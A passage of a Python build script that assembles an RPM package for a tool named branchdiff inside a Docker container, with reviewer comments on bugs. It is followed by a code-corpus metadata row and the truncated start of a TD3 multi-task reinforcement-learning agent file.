            # original code left cmd unbound on unrecognized distros and relied
            # on the broad except below to swallow the UnboundLocalError;
            # cmd=None makes the fall-through explicit (TypeError is caught)
            installed_version = subprocess.getoutput(cmd).split(':')[1].strip()
            return greater_version(installed_version, __version__)
        except Exception:
            logger.info(
                '%s: Build binary %s not installed, comparing current branch version to master branch version' %
                (inspect.stack()[0][3], binary))
    return greater_version(masterbranch_version(version_modpath), __version__)
def greater_version(versionA, versionB):
    """
    Summary:
        Compares two dotted version strings and returns the greater
    Args:
        :versionA (str): dotted version string (e.g. '1.6.10'), '' or None
        :versionB (str): dotted version string, '' or None
    Returns:
        greater version (versionA when equal), TYPE: str
    """
    from itertools import zip_longest
    try:
        list_a = versionA.split('.')
        list_b = versionB.split('.')
    except AttributeError:
        return versionA or versionB    # either A or B is None
    try:
        # pad the shorter version with zeros so '1.2' vs '1.2.3' compares
        # correctly; the original raised IndexError on unequal lengths
        for digit_a, digit_b in zip_longest(list_a, list_b, fillvalue='0'):
            if int(digit_a) > int(digit_b):
                return versionA
            elif int(digit_a) < int(digit_b):
                return versionB
    except ValueError:
        return versionA or versionB    # either A or B is ''
    return versionA
def increment_version(current):
    """
    Summary.
        Returns current version with its final (minor) field incremented by 1
    """
    stem, _, patch = current.rpartition('.')
    # only the last dotted field is bumped; leading fields stay untouched
    return stem + '.' + str(int(patch) + 1)
def tar_archive(archive, source_dir, debug):
    """
    Summary.
        - Creates .tar.gz compressed archive
        - Checks that file was created before exit
    Args:
        :archive (str): full path of the tarball to create
        :source_dir (str): directory whose contents are archived
        :debug (bool): verbose flag, forwarded to clean()
    Returns:
        Success | Failure, TYPE: bool
    """
    try:
        # drop python bytecode artifacts before archiving
        clean(source_dir, debug)
        with tarfile.open(archive, "w:gz") as tar:
            tar.add(source_dir, arcname=os.path.basename(source_dir))
        # confirm the archive actually landed on disk
        return os.path.exists(archive)
    except OSError:
        logger.exception(
            '{}: Unable to create tar archive {}'.format(inspect.stack()[0][3], archive))
    except Exception as e:
        logger.exception(
            '%s: Unknown problem while creating tar archive %s:\n%s' %
            (inspect.stack()[0][3], archive, str(e)))
    return False
def builddir_structure(param_dict, force):
    """
    Summary.
        Assembles the rpm build directory under TMPDIR: copies the main
        executable, library modules, the rpm spec file and the bash
        completion artifacts into place
    Args:
        :param_dict (dict): build parameters; uses the 'SpecFile' (Name,
         BuildDirName) and 'BashCompletion' keys
        :force (bool): currently unused -- TODO confirm intended overwrite
         semantics (the build dir is always recreated below regardless)
    Returns:
        Success | Failure, TYPE: bool
    """
    root = git_root()
    build_root = TMPDIR
    arrow = yl + Colors.BOLD + '-->' + rst
    # files
    specfile = param_dict['SpecFile']['Name']
    compfile = param_dict['BashCompletion']
    builddir = param_dict['SpecFile']['BuildDirName']
    # full paths
    rpm_src = root + '/packaging/rpm'
    builddir_path = build_root + '/' + builddir
    lib_path = root + '/' + 'core'
    try:
        stdout_message(f'Assembling build directory artifacts in {bn + builddir + rst}')
        # create build directory (any pre-existing tree is discarded first)
        if os.path.exists(builddir_path):
            rmtree(builddir_path)
        os.makedirs(builddir_path)
        stdout_message(
            message='Created:\t{}'.format(yl + builddir_path + rst),
            prefix='OK')
        # place main bin to builddir
        if not os.path.exists(builddir_path + '/' + PROJECT_BIN):
            binary_src = root + '/' + PROJECT_BIN
            binary_dst = builddir_path + '/' + PROJECT_BIN
            copyfile(binary_src, binary_dst)
            stdout_message(
                message='Copied: {} {} {}'.format(lk + binary_src + rst, arrow, lk + binary_dst + rst),
                prefix='OK')
        # place library dependencies (skip python bytecode artifacts)
        for libfile in os.listdir(lib_path):
            if libfile.endswith('.pyc') or libfile.endswith('.pyo'):
                continue
            else:
                lib_src = lib_path + '/' + libfile
                lib_dst = builddir_path + '/' + libfile
                copyfile(lib_src, lib_dst)
                stdout_message(
                    message='Copied: {} {} {}'.format(lk + lib_src + rst, arrow, lk + lib_dst + rst),
                    prefix='OK')
        # place specfile in build_root (one level above the build dir)
        spec_dst = build_root + '/' + specfile
        if os.path.exists(spec_dst):
            os.remove(spec_dst)
        copyfile(rpm_src + '/' + specfile, spec_dst)
        # verify build spec placement
        if os.path.exists(spec_dst):
            stdout_message(
                message='Copied: {} {} {}'.format(
                    lk + rpm_src + '/' + specfile + rst, arrow, lk + spec_dst + rst),
                prefix='OK')
        # place bash completion artifacts
        comp_src = root + '/' + 'bash' + '/' + compfile
        comp_dst = builddir_path + '/' + compfile
        if os.path.exists(comp_src):
            if os.path.exists(comp_dst):
                os.remove(comp_dst)
            copyfile(comp_src, comp_dst)
            # verify build spec placement
            if os.path.exists(comp_dst):
                stdout_message(
                    message='Copied: {} {} {}'.format(
                        lk + comp_src + rst, arrow, lk + comp_dst + rst),
                    prefix='OK')
    except OSError as e:
        logger.exception(
            '{}: Problem creating dirs on local fs'.format(inspect.stack()[0][3]))
        return False
    return True
def build_package(build_root, builddir):
    """
    Summary.
        Creates final os installable package for current build, build version
    Args:
        :build_root (str): build root path (not referenced in this function)
        :builddir (str): directory containing the assembled rpmbuild tree
    Returns:
        Success | Failure, TYPE: bool
    """
    try:
        pwd = os.getcwd()
        # guard clause: nothing to do without an assembled build tree
        # (NOTE: the warning text says '.deb' in the original; preserved verbatim)
        if not os.path.exists(builddir):
            logger.warning(
                'Build directory {} not found. Failed to create .deb package'.format(builddir))
            os.chdir(pwd)
            return False
        os.chdir(builddir)
        stdout_message('Building {}... '.format(bn + builddir + rst))
        stdout_message(subprocess.getoutput('rpmbuild -ba SPECS/branchdiff.spec'))
        os.chdir(pwd)
    except OSError as e:
        logger.exception(
            '{}: Error during os package creation: {}'.format(inspect.stack()[0][3], e))
        return False
    except Exception as e:
        logger.exception(
            '{}: Unknown Error during os package creation: {}'.format(inspect.stack()[0][3], e))
        return False
    return True
def builddir_content_updates(param_dict, osimage, version, debug):
    """
    Summary:
        Updates builddir contents:
        - main executable has its library/log paths rewritten for install layout
        - the version module in both the build dir and the git working tree is
          rewritten with the build version
        - placeholder tokens in the spec file are substituted in place
    Args:
        :param_dict (dict): build parameters (SpecFile, VersionModule,
         DockerUser, ProjectUrl, DependencyList keys used)
        :osimage (str): currently unused in this function -- TODO confirm
        :version (str): version label for this build (major.minor.patch)
        :debug (bool): verbose flag, forwarded to clean()
    Returns:
        Success | Failure, TYPE: bool
    """
    root = git_root()
    build_root = TMPDIR
    rpm_src = root + '/packaging/rpm'
    project_dirname = root.split('/')[-1]
    major = '.'.join(version.split('.')[:2])
    minor = version.split('.')[-1]
    # files
    specfile = param_dict['SpecFile']['Name']
    builddir = param_dict['SpecFile']['BuildDirName']
    version_module = param_dict['VersionModule']
    dockeruser = param_dict['DockerUser']
    project_url = param_dict['ProjectUrl']
    # full paths
    builddir_path = build_root + '/' + builddir
    binary_path = builddir_path + '/' + PROJECT_BIN
    lib_src = root + '/' + 'core'
    # dependencies: fold DependencyList into a comma separated string
    deplist = None
    for dep in param_dict['DependencyList']:
        if deplist is None:
            deplist = str(dep)
        else:
            deplist = deplist + ', ' + str(dep)
    try:
        # NOTE(review): '%' binds tighter than '+', so only yl is interpolated
        # into the template; the path and reset code are concatenated after
        stdout_message(
            'Generating build spec file and build artifacts in %s' %
            yl + builddir_path + rst
        )
        # main exec bin: rewrite pkg_lib= and LOG_DIR= lines for install paths
        with open(binary_path) as f1:
            f2 = f1.readlines()
            for index, line in enumerate(f2):
                if line.startswith('pkg_lib='):
                    newline = 'pkg_lib=' + '\"' + '/usr/local/lib/' + PROJECT + '\"\n'
                    f2[index] = newline
                elif line.startswith('LOG_DIR='):
                    logline = 'LOG_DIR=' + '\"' + '/var/log' + '\"\n'
                    f2[index] = logline
            f1.close()
        # rewrite bin
        with open(binary_path, 'w') as f3:
            f3.writelines(f2)
            path = binary_path
            stdout_message('Bin {} successfully updated.'.format(yl + path + rst))
        # rewrite version file with current build ver
        # NOTE(review): the names f3/f4 are reused below as list variables,
        # shadowing the file handles above -- confusing but harmless
        with open(builddir_path + '/' + version_module, 'w') as f4:
            f3 = ['__version__=\"' + version + '\"\n']
            f4.writelines(f3)
            path = builddir_path + '/' + version_module
            stdout_message('Module {} successfully updated.'.format(yl + path + rst))
        # rewrite git project version file with current build version in case delta
        with open(lib_src + '/' + version_module, 'w') as f5:
            f4 = ['__version__=\"' + version + '\"\n']
            f5.writelines(f4)
            path = '../' + project_dirname + (lib_src + '/' + version_module)[len(root):]
            stdout_message('Module {} successfully updated.'.format(yl + path + rst))
        if os.path.exists(build_root + '/' + specfile):
            # update specfile - major version
            for line in fileinput.input([build_root + '/' + specfile], inplace=True):
                print(line.replace('MAJOR_VERSION', major), end='')
            stdout_message(f'Updated {specfile} with MAJOR_VERSION', prefix='OK')
            # update specfile - minor version
            for line in fileinput.input([build_root + '/' + specfile], inplace=True):
                print(line.replace('MINOR_VERSION', minor), end='')
            stdout_message(f'Updated {specfile} with MINOR_VERSION', prefix='OK')
            # update specfile - DOCKERUSER
            for line in fileinput.input([build_root + '/' + specfile], inplace=True):
                print(line.replace('DOCKERUSER', dockeruser), end='')
            stdout_message(f'Updated {specfile} with DOCKERUSER ({dockeruser})', prefix='OK')
            # update specfile - Dependencies
            for line in fileinput.input([build_root + '/' + specfile], inplace=True):
                print(line.replace('DEPLIST', deplist), end='')
            stdout_message(f'Updated {specfile} with Dependencies ({deplist})', prefix='OK')
            # update specfile - major version
            for line in fileinput.input([build_root + '/' + specfile], inplace=True):
                print(line.replace('PROJECT_URL', project_url), end='')
            stdout_message(f'Updated {specfile} with PROJECT_URL', prefix='OK')
        else:
            stdout_message(
                message=f'{specfile} not found in build directory. Cannot update... halting build.',
                prefix='WARN')
            sys.exit(1)
        # rm residual installation files from build directory
        clean(builddir_path, debug)
    except OSError as e:
        logger.exception(
            '%s: Problem while updating builddir contents: %s' %
            (inspect.stack()[0][3], str(e)))
        return False
    return True
def cp_dockerfiles(src, dst):
    """
    Copy dockerfiles and associated build artifacts to build_root
    >> NOT CURRENTLY USED <<
    NOTE(review): this function references names that are not defined at
    module scope (dockerscript, build_root, docker_path, builddir_path) and
    would raise NameError if ever called -- confirm before re-enabling.
    """
    # place docker build script
    script_src = src + '/' + dockerscript
    script_dst = build_root + '/' + dockerscript
    build_list = os.listdir(src)
    for file in build_list:
        # presumably 'file' should be joined with src here -- as written the
        # copy source is relative to the cwd; verify against the caller
        copyfile(file, dst + '/' + file)
    # cp Dockerfile to build root
    copyfile(
        docker_path + '/' + 'Dockerfile',
        builddir_path + '/' + 'Dockerfile'
    )
    # verify build spec placement
    stdout_message(
        message='Copied: {} {} {}'.format(
            lk + script_src + rst, arrow, lk + script_dst + rst),
        prefix='OK')
    return build_list
def container_running(cid, debug=False):
    """
    Summary:
        Verifies if a container is actively running
    Args:
        :cid (str): Container name or hex identifier
        :debug (bool): when True, also print a status message on SDK success
    Returns:
        True (running) | False (stopped)
        TYPE: bool
    """
    success_msg = f'Container {cid} running'
    try:
        # preferred path: query the docker SDK for the container state
        if dclient.containers.get(cid).status == 'running':
            if debug:
                stdout_message(success_msg, prefix='OK')
            return True
    except Exception:
        # fallback: shell out to the docker cli and scan the process list
        if cid in subprocess.getoutput('docker ps'):
            stdout_message(success_msg, prefix='OK')
            return True
        stdout_message(f'Container {cid} stopped', prefix='WARN')
    return False
def display_package_contents(rpm_path, contents):
    """
    Summary:
        Output newly built package contents.
    Args:
        :rpm_path (str): location of newly built rpm package
        :contents (str): path to the text file listing the package contents
    Returns:
        Success | Failure, TYPE: bool
    """
    tab = '\t'.expandtabs(2)
    tab4 = '\t'.expandtabs(4)
    width = 90
    package = os.path.split(rpm_path)[1]
    path, discard = os.path.split(contents)
    pwd = os.getcwd()
    # move next to the contents file so it opens by name
    if path:
        os.chdir(path)
    with open(contents) as f1:
        unformatted = f1.readlines()
    # title header and subheader
    header = '\n\t\tPackage Contents: ' + bd + package + rst + '\n'
    print(header)
    subheader = tab + 'Permission' + tab + ' Owner/Group' + '\t' + 'ctime' \
        + '\t'.expandtabs(8) + 'File'
    print(subheader)
    # divider line (replaces the original obfuscated filter/print construct;
    # emits the same bytes: width+1 dashes, '\r', newline)
    print('-' * (width + 1) + '\r')
    # content
    for line in unformatted:
        fields = line.split()          # split once per line (was 3x per line)
        permissions = tab + fields[0]
        raw = tab4 + 'root root'
        f_ctime = tab4 + ''.join([x + ' ' for x in fields[5:8]])
        content_path = tab4 + yl + fields[-1] + rst
        print(permissions + raw + f_ctime + content_path)
    print('\n')
    os.chdir(pwd)
    return True
def docker_daemon_up():
    """
    Summary:
        Determines if docker installed and running by
        evaluating the exit code of docker images cmd
    Returns:
        True (running) | False, TYPE: bool
    """
    # exit status of 'docker images' is 0 only when the daemon answers
    probe = 'docker images >/dev/null 2>&1; echo $?'
    if which('docker') and int(subprocess.getoutput(probe)) == 0:
        return True
    stdout_message('Docker engine not running or not accessible', prefix='WARN')
    return False
def docker_init(src, builddir, osimage, param_dict, debug):
    """
    Summary:
        Creates docker image and container, copies the build artifacts into
        the container and executes the rpmbuild script inside it
    Args:
        :src (str): directory containing the Dockerfile and build scripts
        :builddir (str): directory where the build artifacts were assembled
        :osimage (str): docker base OS image name (e.g. 'centos7')
        :param_dict (dict): build parameters (DockerImage, DockerContainer)
        :debug (bool): verbose output flag
    Returns:
        Container id (Name) | Failure (None)
    """
    imagename = osimage + ':' + param_dict['DockerImage']       # image name
    cname = param_dict['DockerContainer']                       # container id
    host_mnt = VOLMNT                                           # host volume mount point
    container_mnt = CONTAINER_VOLMNT                            # container volume internal mnt pt
    docker_user = 'builder'
    bash_cmd = '/bin/sleep 30'          # keeps the container alive while files are copied in
    buildscript = 'docker-buildrpm.sh'
    # copy buildscript to directory where build files assembled
    copyfile(src + '/' + buildscript, builddir + '/' + buildscript)
    try:
        # create host mount for container volume
        if not os.path.exists(host_mnt):
            os.makedirs(host_mnt)
            stdout_message(f'Created host mount {host_mnt} for container volume')
        # if image rpmbuild not exist, create
        try:
            image = dclient.images.get(imagename)
            if image:
                stdout_message('Image already exists. Creating Container...')
        except Exception:
            # create new docker image from the Dockerfile in src
            os.chdir(src)
            cmd = 'docker build -t {} . '.format(imagename)
            subprocess.call([cmd], shell=True, cwd=src)
            stdout_message('Built image', prefix='OK')
        # start container detached
        container = dclient.containers.run(
            name=cname,
            image=imagename,
            command=bash_cmd,
            volumes={host_mnt: {'bind': container_mnt, 'mode': 'rw'}},
            user=docker_user,
            detach=True
        )
        # verify container is running
        if not container_running(cname):
            stdout_message(f'Container {cname} not started - abort', prefix='WARN')
            return False
        # copy build files to container
        stdout_message('Begin cp files into container')
        # copy files from temporary build directory to container
        os.chdir(builddir)
        buildfile_list = list(
            filter(
                lambda x: x.endswith('.tar.gz') or x.endswith('.spec') or x.endswith('.sh'), os.listdir('.')
            )
        )
        if debug:
            print(f'buildfile_list contains:\n\n\t%s' % export_json_object(buildfile_list))
            print(f'osimage is: {osimage}')
            print(f'imagename is: {imagename}')
            print(f'container name is: {container.name}')
        for file in buildfile_list:
            # local fs >> container:/home/builder
            cmd = f'docker cp {file} {container.name}:/home/builder/{file}'
            # status: docker cp prints nothing on success
            if not subprocess.getoutput(cmd):
                stdout_message(f'{file} copied to container {container.name} successfully')
            else:
                stdout_message(
                    f'Problem copying {file} to container {container.name}',
                    prefix='WARN'
                )
        # exec rpmbuild script inside the container
        cmd = f'docker exec -i {container.name} sh -c \'cd /home/builder && bash {buildscript}\''
        stdout_message(subprocess.getoutput(cmd))
        if container_running(container.name):
            return container
    except OSError as e:
        logger.exception(
            '%s: Problem while updating builddir contents: %s' %
            (inspect.stack()[0][3], str(e)))
    return None
def main(setVersion, environment, package_configpath, force=False, debug=False):
    """
    Summary:
        Create build directories, populate contents, update contents, and
        run the container-based rpm build.
    Args:
        :setVersion (str): version number of rpm created (overrides auto-increment)
        :environment (str): target distro label; selects docker dir and image
        :package_configpath (str): full path to json configuration file
        :force (bool): If True, overwrites any pre-existing build artifacts
            (currently accepted for interface compatibility; not used here)
        :debug (bool): verbose output
    Returns:
        (package_path, contents) tuple on success; (None, None) on failure
    """
    # all globals declared here
    global PROJECT_BIN
    PROJECT_BIN = 'branchdiff'
    global PROJECT_ROOT
    PROJECT_ROOT = git_root()
    global SCRIPT_DIR
    SCRIPT_DIR = PROJECT_ROOT + '/' + 'scripts'
    global BUILD_ROOT
    BUILD_ROOT = TMPDIR
    global RPM_SRC
    RPM_SRC = PROJECT_ROOT + '/packaging/rpm'
    global LIB_DIR
    LIB_DIR = PROJECT_ROOT + '/' + 'core'
    global CURRENT_VERSION
    CURRENT_VERSION = current_version(PROJECT_BIN, LIB_DIR + '/version.py')
    # sort out version numbers; an explicit setVersion overrides auto-increment
    global VERSION
    if setVersion:
        VERSION = setVersion
    elif CURRENT_VERSION:
        VERSION = increment_version(CURRENT_VERSION)
    else:
        stdout_message('Could not determine current {} version'.format(bd + PROJECT + rst))
        sys.exit(exit_codes['E_DEPENDENCY']['Code'])
    # log
    stdout_message(f'Current version of last build: {bd + CURRENT_VERSION + rst}')
    stdout_message(f'Version to be used for this build: {act + VERSION + rst}')
    # create initial binary working dir
    BUILDDIRNAME = PROJECT + '-' + '.'.join(VERSION.split('.')[:2])
    # substitute current build values into the rpm parameter set
    parameter_obj = ParameterSet(package_configpath, VERSION)
    params = parameter_obj.create()  # renamed from `vars` (shadowed the builtin)
    VERSION_FILE = params['VersionModule']
    if debug:
        print(json.dumps(params, indent=True, sort_keys=True))
    r_structure = builddir_structure(params, VERSION)
    r_updates = builddir_content_updates(params, environment, VERSION, debug)
    # create tar archive
    target_archive = BUILD_ROOT + '/' + PROJECT_BIN + '-' + VERSION + '.tar.gz'
    source_dir = BUILD_ROOT + '/' + BUILDDIRNAME
    r_tarfile = tar_archive(target_archive, source_dir, debug)
    # launch docker container and execute final build steps
    if r_structure and r_updates and r_tarfile:
        # status — bugfix: target_archive already begins with BUILD_ROOT,
        # so do not prepend BUILD_ROOT a second time in the message
        msg = yl + target_archive + rst
        stdout_message('tgz archive built: %s' % msg)
        # trigger docker build based on environment:
        container = docker_init(
            PROJECT_ROOT + '/packaging/docker/' + environment,
            BUILD_ROOT,
            environment,
            params,
            debug
        )
        if container:
            result = postbuild(PROJECT_ROOT, container, RPM_SRC, SCRIPT_DIR, VERSION_FILE, VERSION)
            # normalise legacy falsy returns ('' / False) so callers can
            # always unpack a 2-tuple
            return result if isinstance(result, tuple) else (None, None)
    return None, None
def options(parser, help_menu=False):
    """
    Summary:
        parse cli parameter options
    Returns:
        TYPE: argparse object, parser argument set
    """
    # table-driven registration: (short flag, long flag, add_argument kwargs)
    switches = [
        ("-b", "--build", dict(dest='build', default=False, action='store_true', required=False)),
        ("-D", "--debug", dict(dest='debug', default=False, action='store_true', required=False)),
        ("-d", "--distro", dict(dest='distro', default='centos7', nargs='?', type=str, required=False)),
        ("-F", "--force", dict(dest='force', default=False, action='store_true', required=False)),
        ("-p", "--parameter-file", dict(dest='parameter_file', default='.rpm.json', nargs='?', required=False)),
        ("-s", "--set-version", dict(dest='set', default=None, nargs='?', type=str, required=False)),
        ("-h", "--help", dict(dest='help', default=False, action='store_true', required=False)),
    ]
    for short_flag, long_flag, kwargs in switches:
        parser.add_argument(short_flag, long_flag, **kwargs)
    return parser.parse_args()
def is_installed(binary):
    """
    Verifies if program installed on Redhat-based Linux system.
    Queries the rpm database; any (non-empty) output counts as installed.
    NOTE(review): *binary* is interpolated into a shell pipeline — safe only
    for trusted input.
    """
    output = subprocess.getoutput('rpm -qa | grep ' + binary)
    return bool(output)
def ospackages(pkg_list):
    """Summary
        Install OS Package Prerequisites via yum or dnf, skipping any
        package already present in the rpm database.
    Returns:
        Success | Failure, TYPE: bool
    """
    try:
        for pkg in pkg_list:
            if is_installed(pkg):
                logger.info(f'{pkg} binary is already installed - skip')
            elif which('yum'):
                print(subprocess.getoutput('sudo yum install ' + pkg + ' 2>/dev/null'))
            elif which('dnf'):
                print(subprocess.getoutput('sudo dnf install ' + pkg + ' 2>/dev/null'))
            else:
                logger.warning(
                    '%s: Dependent OS binaries not installed - package manager not identified' %
                    inspect.stack()[0][3])
    except OSError:
        logger.exception('{}: Problem installing os package {}'.format(inspect.stack()[0][3], pkg))
        return False
    return True
def prebuild(builddir, libsrc, volmnt, parameter_file):
    """Summary:
    Prerequisites and dependencies for build execution: removes stale build
    artifacts, recreates the build and volume-mount directories, copies the
    version module into the scripts dir, and imports __version__ from it.
    Args:
        :builddir (str): temporary build directory (recreated here)
        :libsrc (str): project core/ directory containing the version module
        :volmnt (str): host mount directory for the container volume (recreated)
        :parameter_file (str): path to json build-parameter file
    Returns:
        Success | Failure, TYPE: bool
    """
    def preclean(dir, artifact=''):
        """Cleans residual build artifacts by removing """
        # With artifact set, removes libsrc/<artifact>; otherwise removes
        # the whole directory `dir`. Missing paths are treated as success.
        try:
            if artifact:
                if os.path.exists(libsrc + '/' + artifact):
                    rmtree(libsrc + '/' + artifact)  # clean artifact from inside an existing dir
            elif os.path.exists(dir):
                rmtree(dir)  # rm entire directory
        except OSError as e:
            logger.exception(
                '%s: Error while cleaning residual build artifacts: %s' %
                (inspect.stack()[0][3], str(e)))
            return False
        return True
    version_module = json.loads(read(parameter_file))['VersionModule']
    try:
        # NOTE: short-circuit — the status message prints only if all three
        # precleans succeed, but the build continues either way
        if preclean(builddir) and preclean(volmnt) and preclean(libsrc, '__pycache__'):
            stdout_message(f'Removed pre-existing build artifacts ({builddir}, {volmnt})')
        os.makedirs(builddir)
        os.makedirs(volmnt)
        root = git_root()
        src = root + '/core' + '/' + version_module
        dst = root + '/scripts' + '/' + version_module
        # deal with leftover build artifacts
        if os.path.exists(dst):
            os.remove(dst)
        r_cf = copyfile(src, dst)
        # import version module
        # NOTE(review): `from version import ...` assumes the scripts dir (or
        # cwd) holding the copied module is on sys.path — confirm at call site
        global __version__
        from version import __version__
        if r_cf and __version__ and docker_daemon_up():
            return True
    except Exception as e:
        logger.exception(
            '{}: Failure to import __version__ parameter'.format(inspect.stack()[0][3])
        )
    return False
def locate_artifact(filext, origin):
    """
    Summary.
        Recursively search *origin* for the first file whose name ends
        with *filext* (e.g. ".rpm").
    Args:
        :filext (str): File extension searching for (".rpm")
        :origin (str): Starting directory for recursive search
    Returns:
        full (absolute) path to the first matching file | None if not found
    """
    for dirpath, _subdirs, filenames in os.walk(origin):
        match = next((name for name in filenames if name.endswith(filext)), None)
        if match is not None:
            return os.path.abspath(os.path.join(dirpath, match))
    return None
def postbuild(root, container, rpm_root, scripts_dir, version_module, version):
    """
    Summary:
        Post-build clean up: copy the rpm artifact out of the container
        volume, stop and remove the build container, drop the temporary
        version-module copy, and rewrite the version file.
    Args:
        :root (str): project root directory
        :container (object): Docker container object
        :rpm_root (str): target dir for rpm package files
        :scripts_dir (str): directory holding the temporary version module copy
        :version_module (str): name of module containing version number
        :version (str): current version label (Example: 1.6.8)
    Returns:
        (package_path, contents) tuple; (None, None) on failure.
        Either element may be None if the corresponding artifact was not found.
    """
    project_dirname = root.split('/')[-1]
    volmnt = VOLMNT
    package_path, contents = None, None
    try:
        # cp rpm created to repo (bugfix: previously package_path could be
        # referenced unbound when no rpm was found)
        package = locate_artifact('.rpm', volmnt)
        if package:
            # NOTE(review): shutil.copyfile expects a file destination —
            # confirm `copyfile` here tolerates the rpm_root directory
            copyfile(package, rpm_root)
            package_path = rpm_root + '/' + os.path.split(package)[1]
        # rpm contents text file
        contents = locate_artifact('.txt', volmnt)
        # stop and rm container
        subprocess.getoutput(f'docker stop {container.name}')
        # status
        if not container_running(container.name):
            stdout_message(f'{container.name} successfully halted', prefix='OK')
            subprocess.getoutput(f'docker rm {container.name}')
        # remove temp version module copied to scripts dir
        if os.path.exists(scripts_dir + '/' + version_module):
            os.remove(scripts_dir + '/' + version_module)
        # rewrite version file with current build version
        with open(root + '/core/' + version_module, 'w') as f3:
            f3.writelines(['__version__=\"' + version + '\"\n'])
        path = project_dirname + (root + '/core/' + version_module)[len(root):]
        stdout_message(
            '{}: Module {} successfully updated.'.format(inspect.stack()[0][3], yl + path + rst)
        )
    except OSError:
        logger.exception('{}: Postbuild clean up failure'.format(inspect.stack()[0][3]))
        # bugfix: previously returned '' here while returning a tuple on
        # success, which broke tuple-unpacking callers
        return None, None
    return package_path, contents
class ParameterSet():
    """Recursion class for processing complex dictionary schema.

    Loads the json parameter file once, derives major/minor version labels,
    and substitutes build-specific values into the parameter tree in place.
    """

    def __init__(self, parameter_file, version):
        """
        Summary.
            Retains major and minor version numbers + parameters
            in json form for later use
        Args:
            :parameter_file (str): path to json file obj containing
                parameter keys and values
            :version (str): current build version
        """
        self.parameter_dict = json.loads(read(parameter_file))
        self.version = version
        pieces = self.version.split('.')
        self.major = '.'.join(pieces[:2])
        self.minor = pieces[-1]

    def create(self, parameters=None):
        """
        Summary.
            Walk the (possibly nested) parameter dict and substitute values
            appropriate for the active build. Mutates in place.
        Args:
            :parameters (dict): dictionary of all parameters used to gen rpm;
                defaults to the dict loaded at construction time
        Returns:
            parameters, TYPE: dict
        """
        if parameters is None:
            parameters = self.parameter_dict
        for key, value in parameters.items():
            if isinstance(value, dict):
                self.create(value)      # recurse into nested mappings
            elif key == 'Version':
                parameters[key] = self.major
            elif key == 'Release':
                parameters[key] = self.minor
            elif key == 'Source':
                parameters[key] = '{}-{}.{}.tar.gz'.format(PROJECT, self.major, self.minor)
            elif key == 'BuildDirName':
                parameters[key] = PROJECT + '-' + self.major
        return parameters
def valid_version(parameter, min=0, max=100):
    """
    Summary.
        User input validation. Validates version string made up of integers.
        Example: '1.6.2'. Each integer in the version sequence must be in
        a range of > 0 and < 100. Maximum version string digits is 3
        (Example: 0.2.3)
    Args:
        :parameter (str): Version string from user input
        :min (int): Minimum allowable integer value a single digit in version
            string provided as a parameter
        :max (int): Maximum allowable integer value a single digit in a version
            string provided as a parameter
    Returns:
        True if parameter valid or None, False if invalid, TYPE: bool
    """
    # type correction and validation
    if parameter is None:
        return True
    if isinstance(parameter, int):
        return False
    if isinstance(parameter, float):
        parameter = str(parameter)
    component_list = parameter.split('.')
    # bugfix: the documented 3-component maximum was not enforced — strings
    # such as '1.2.3.4' previously validated as True
    if len(component_list) > 3:
        return False
    try:
        for component in component_list:
            # int(component) raises ValueError for non-numeric components
            if int(component) not in range(min, max + 1):
                return False
    except ValueError:
        return False
    return True
def init_cli():
    """Collect parameters and call main. Returns a process exit code."""
    try:
        parser = argparse.ArgumentParser(add_help=False)
        args = options(parser)
    except Exception as e:
        help_menu()
        stdout_message(str(e), 'ERROR')
        return exit_codes['E_MISC']['Code']
    if not os.path.isfile(args.parameter_file):
        stdout_message(
            message='Path to parameters file not found. Abort',
            prefix='WARN'
        )
        return exit_codes['E_DEPENDENCY']['Code']
    if args.debug:
        print(debug_header)
        # one DBUG line per parsed option
        for template, value in (
            ('Set (--set-version):\t{}', args.set),
            ('Build Flag (--build):\t{}', args.build),
            ('Docker Image (--distro):\t{}', args.distro),
            ('Parameter File (--parameters):\t{}', args.parameter_file),
            ('Debug Flag:\t\t{}', args.debug),
        ):
            stdout_message(message=template.format(value), prefix='DBUG')
    if len(sys.argv) == 1:
        help_menu()
        return exit_codes['EX_OK']['Code']
    elif args.help:
        help_menu()
        return exit_codes['EX_OK']['Code']
    elif args.build:
        libsrc = git_root() + '/' + 'core'
        if valid_version(args.set) and prebuild(TMPDIR, libsrc, VOLMNT, git_root() + '/' + args.parameter_file):
            result = main(
                setVersion=args.set,
                environment=args.distro,
                package_configpath=git_root() + '/' + args.parameter_file,
                force=args.force,
                debug=args.debug
            )
            # bugfix: main historically returned False / '' on failure, which
            # crashed the original direct 2-tuple unpack
            package, contents = result if isinstance(result, tuple) else (None, None)
            if package:
                stdout_message(f'New package created: {yl + package + rst}')
                stdout_message('RPM build process completed successfully. End', prefix='OK')
                if contents:
                    display_package_contents(package, contents)
                else:
                    # bugfix: `build_root` was an undefined name (NameError);
                    # contents files are produced in the container volume mount
                    stdout_message(
                        message=f'Unable to locate a rpm contents file in {VOLMNT}.',
                        prefix='WARN')
                    return False
                return exit_codes['EX_OK']['Code']
        else:
            stdout_message(
                '{}: Problem creating rpm installation package. Exit'.format(inspect.stack()[0][3]),
                prefix='WARN',
                severity='WARNING'
            )
            return exit_codes['E_MISC']['Code']
    elif not valid_version(args.set):
        stdout_message(
            'You must enter a valid version when using --set-version parameter. Ex: 1.6.3',
            prefix='WARN',
            severity='WARNING'
        )
        return exit_codes['E_DEPENDENCY']['Code']
    else:
        logger.warning('{} Failure in prebuild stage'.format(inspect.stack()[0][3]))
        return exit_codes['E_DEPENDENCY']['Code']
    return True
sys.exit(init_cli())  # script entry point: propagate init_cli()'s return value as the exit status
| 33.01859 | 136 | 0.572853 | 1,689 | 0.039623 | 0 | 0 | 0 | 0 | 0 | 0 | 17,145 | 0.40221 |
2bcb666bd56d9bf21750baa9263c491c8e80469a | 4,731 | py | Python | agent/td3mt.py | xuzhiyuan1528/KTM-DRL | a98e7c3b74fc2cd1bd999a3bbf8f8ad071e0269a | [
"Apache-2.0"
] | 10 | 2020-11-01T05:29:31.000Z | 2022-03-12T08:42:48.000Z | agent/td3mt.py | xuzhiyuan1528/KTM-DRL | a98e7c3b74fc2cd1bd999a3bbf8f8ad071e0269a | [
"Apache-2.0"
] | null | null | null | agent/td3mt.py | xuzhiyuan1528/KTM-DRL | a98e7c3b74fc2cd1bd999a3bbf8f8ad071e0269a | [
"Apache-2.0"
] | 4 | 2020-11-01T05:16:51.000Z | 2021-02-22T22:55:14.000Z | import torch
import torch.nn.functional as F
from agent.td3 import TD3
class TD3MT(TD3):
def __init__(self,
state_dim,
action_dim,
max_action,
num_env,
discount=0.99,
tau=0.005,
policy_noise=0.2,
noise_clip=0.5,
policy_freq=2,
cuda_index=None
):
